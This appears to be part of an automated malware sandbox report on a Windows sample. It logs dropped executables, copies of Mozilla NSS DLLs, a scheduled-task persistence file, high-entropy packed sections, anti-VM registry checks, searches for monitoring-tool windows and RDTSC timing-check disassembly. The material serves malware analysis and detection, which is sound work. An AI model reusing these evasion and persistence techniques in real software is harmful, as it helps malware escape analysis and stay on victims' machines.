Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Unpacked PE file: 8.2.KKEBKJJDGH.exe.250000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kcajosdi:EW;tlivgrwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kcajosdi:EW;tlivgrwy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Unpacked PE file: 10.2.explortu.exe.220000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kcajosdi:EW;tlivgrwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kcajosdi:EW;tlivgrwy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Unpacked PE file: 11.2.explortu.exe.220000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kcajosdi:EW;tlivgrwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kcajosdi:EW;tlivgrwy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Unpacked PE file: 13.2.3eb62d09c2.exe.d00000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Unpacked PE file: 15.2.explortu.exe.220000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kcajosdi:EW;tlivgrwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kcajosdi:EW;tlivgrwy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Unpacked PE file: 17.2.explortu.exe.220000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kcajosdi:EW;tlivgrwy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kcajosdi:EW;tlivgrwy:EW;.taggant:EW;
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C82C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C82C410
Source: initial sample Static PE information: section where entry point is pointing to: .data
Source: explortu.exe.8.dr Static PE information: real checksum: 0x1de832 should be: 0x1e2c33
Source: random[1].exe.10.dr Static PE information: real checksum: 0x0 should be: 0x26d947
Source: KKEBKJJDGH.exe.0.dr Static PE information: real checksum: 0x1de832 should be: 0x1e2c33
Source: 3eb62d09c2.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x26d947
Source: EZrw1nNIpG.exe Static PE information: real checksum: 0x0 should be: 0x27a056
Source: amadka[1].exe.0.dr Static PE information: real checksum: 0x1de832 should be: 0x1e2c33
Source: EZrw1nNIpG.exe Static PE information: section name:
Source: EZrw1nNIpG.exe Static PE information: section name:
Source: EZrw1nNIpG.exe Static PE information: section name:
Source: EZrw1nNIpG.exe Static PE information: section name:
Source: EZrw1nNIpG.exe Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: kcajosdi
Source: amadka[1].exe.0.dr Static PE information: section name: tlivgrwy
Source: amadka[1].exe.0.dr Static PE information: section name: .taggant
Source: KKEBKJJDGH.exe.0.dr Static PE information: section name:
Source: KKEBKJJDGH.exe.0.dr Static PE information: section name: .idata
Source: KKEBKJJDGH.exe.0.dr Static PE information: section name:
Source: KKEBKJJDGH.exe.0.dr Static PE information: section name: kcajosdi
Source: KKEBKJJDGH.exe.0.dr Static PE information: section name: tlivgrwy
Source: KKEBKJJDGH.exe.0.dr Static PE information: section name: .taggant
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: explortu.exe.8.dr Static PE information: section name:
Source: explortu.exe.8.dr Static PE information: section name: .idata
Source: explortu.exe.8.dr Static PE information: section name:
Source: explortu.exe.8.dr Static PE information: section name: kcajosdi
Source: explortu.exe.8.dr Static PE information: section name: tlivgrwy
Source: explortu.exe.8.dr Static PE information: section name: .taggant
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: 3eb62d09c2.exe.10.dr Static PE information: section name:
Source: 3eb62d09c2.exe.10.dr Static PE information: section name:
Source: 3eb62d09c2.exe.10.dr Static PE information: section name:
Source: 3eb62d09c2.exe.10.dr Static PE information: section name:
Source: 3eb62d09c2.exe.10.dr Static PE information: section name:
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7FB536 push ecx; ret 0_2_6C7FB549
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_0023CFEC push ecx; ret 10_2_0023CFFF
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F212820 push 7F210002h; ret 13_2_7F21282F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211C20 push 7F210002h; ret 13_2_7F211C2F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211920 push 7F210002h; ret 13_2_7F21192F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F210D20 push 7F210002h; ret 13_2_7F210D2F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211020 push 7F210002h; ret 13_2_7F21102F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211320 push 7F210002h; ret 13_2_7F21132F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211620 push 7F210002h; ret 13_2_7F21162F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211F20 push 7F210002h; ret 13_2_7F211F2F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F212220 push 7F210002h; ret 13_2_7F21222F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F212520 push 7F210002h; ret 13_2_7F21252F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F212A30 push 7F210002h; ret 13_2_7F212A3F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F212730 push 7F210002h; ret 13_2_7F21273F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211B30 push 7F210002h; ret 13_2_7F211B3F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F210C30 push 7F210002h; ret 13_2_7F210C3F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F210F30 push 7F210002h; ret 13_2_7F210F3F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211230 push 7F210002h; ret 13_2_7F21123F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211530 push 7F210002h; ret 13_2_7F21153F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211830 push 7F210002h; ret 13_2_7F21183F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211E30 push 7F210002h; ret 13_2_7F211E3F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F212130 push 7F210002h; ret 13_2_7F21213F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F212430 push 7F210002h; ret 13_2_7F21243F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F212A00 push 7F210002h; ret 13_2_7F212A0F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F212700 push 7F210002h; ret 13_2_7F21270F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F212400 push 7F210002h; ret 13_2_7F21240F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F212100 push 7F210002h; ret 13_2_7F21210F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211E00 push 7F210002h; ret 13_2_7F211E0F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211B00 push 7F210002h; ret 13_2_7F211B0F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F211800 push 7F210002h; ret 13_2_7F21180F
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F210000 push edi; mov dword ptr [esp], esi 13_2_7F2100B5
Source: EZrw1nNIpG.exe Static PE information: section name: entropy: 7.995804911352308
Source: EZrw1nNIpG.exe Static PE information: section name: entropy: 7.978361575135612
Source: EZrw1nNIpG.exe Static PE information: section name: entropy: 7.950738565954194
Source: amadka[1].exe.0.dr Static PE information: section name: entropy: 7.986768958978906
Source: amadka[1].exe.0.dr Static PE information: section name: kcajosdi entropy: 7.955236548393852
Source: KKEBKJJDGH.exe.0.dr Static PE information: section name: entropy: 7.986768958978906
Source: KKEBKJJDGH.exe.0.dr Static PE information: section name: kcajosdi entropy: 7.955236548393852
Source: explortu.exe.8.dr Static PE information: section name: entropy: 7.986768958978906
Source: explortu.exe.8.dr Static PE information: section name: kcajosdi entropy: 7.955236548393852
Source: random[1].exe.10.dr Static PE information: section name: entropy: 7.995210658613367
Source: random[1].exe.10.dr Static PE information: section name: entropy: 7.9817377290068
Source: random[1].exe.10.dr Static PE information: section name: entropy: 7.947361946751107
Source: 3eb62d09c2.exe.10.dr Static PE information: section name: entropy: 7.995210658613367
Source: 3eb62d09c2.exe.10.dr Static PE information: section name: entropy: 7.9817377290068
Source: 3eb62d09c2.exe.10.dr Static PE information: section name: entropy: 7.947361946751107
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe File created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File created: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\ProgramData\softokn3.dll

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe File created: C:\Windows\Tasks\explortu.job
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C8255F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C8255F0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 41DAE5 second address: 41DAE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4380CE second address: 4380D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4380D6 second address: 4380DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C2DC second address: 43C34B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F742CC44208h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+122D3692h] 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007F742CC44208h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 0000001Ah 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 mov edx, dword ptr [ebp+122D36EAh] 0x0000004a call 00007F742CC44209h 0x0000004f push ebx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F742CC4420Ah 0x00000057 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C34B second address: 43C36F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F742CEB81D9h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C36F second address: 43C39F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC4420Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jbe 00007F742CC44212h 0x00000014 jbe 00007F742CC4420Ch 0x0000001a je 00007F742CC44206h 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 je 00007F742CC4420Ch 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C4CF second address: 43C4E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C4E4 second address: 43C4EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C4EA second address: 43C4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C4EE second address: 43C501 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F742CC44208h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C501 second address: 43C529 instructions: 0x00000000 rdtsc 0x00000002 js 00007F742CEB81C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 js 00007F742CEB81E2h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F742CEB81D0h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C529 second address: 43C53A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F742CC44206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C53A second address: 43C545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F742CEB81C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C545 second address: 43C5C6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F742CC44218h 0x00000008 jmp 00007F742CC44212h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push edi 0x00000014 pushad 0x00000015 jmp 00007F742CC44214h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d pop edi 0x0000001e pop eax 0x0000001f mov dword ptr [ebp+122D33B3h], ebx 0x00000025 push 00000003h 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007F742CC44208h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 mov esi, dword ptr [ebp+122D2DB9h] 0x00000047 push 00000000h 0x00000049 mov edx, ebx 0x0000004b push 00000003h 0x0000004d jmp 00007F742CC4420Ch 0x00000052 push E025D071h 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a push edi 0x0000005b pop edi 0x0000005c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 43C5C6 second address: 43C5DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 44CFFB second address: 44D001 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 45AAD6 second address: 45AAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F742CEB81CAh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 45AAF4 second address: 45AB0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F742CC44206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F742CC4420Ch 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 45AB0C second address: 45AB12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 45AB12 second address: 45AB18 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 45AC9A second address: 45ACA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 45ACA0 second address: 45ACA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 45ACA6 second address: 45ACB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 45ACB1 second address: 45ACBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F742CC44206h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
